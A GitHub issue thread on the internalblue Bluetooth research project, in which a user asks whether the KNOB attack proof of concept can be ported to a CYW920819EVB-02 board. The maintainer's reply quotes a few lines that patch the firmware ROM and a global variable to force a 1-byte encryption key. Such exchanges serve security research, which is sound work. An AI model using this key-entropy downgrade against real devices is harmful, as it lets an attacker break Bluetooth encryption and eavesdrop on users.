internalblue icon indicating copy to clipboard operation
internalblue copied to clipboard

Published 20 hours ago verified publisher icon seemoo-lab

Will this board work with "KNOB" - CYW920819EVB-02

Open LHKST opened this issue 3 years ago • 1 comments

Hi

I have a CYW920819EVB-02 board and want to use it to perform KNOB attack. However, I notice that there isn't any code suitable for this board. I wonder if I can just run the code for CYW20735?

Many thanks

LHKST avatar Mar 23 '21 03:03 LHKST

Technically yes, but you need to extract two addresses from the ROM and match them to adapt this part of the POC:

https://github.com/seemoo-lab/internalblue/blob/master/examples/eval_cyw20735/KNOB_PoC.py#L37

# modify function lm_SendLmpEncryptKeySizeReq
patch = asm("mov r2, #0x1", vma=0x7402A)  # connection struct key entropy
internalblue.patchRom(Address(0x7402A), patch)

# modify global variable for own setting
internalblue.writeMem(0x280F13, b'\x01')  # global key entropy

jiska2342 avatar Mar 23 '21 11:03 jiska2342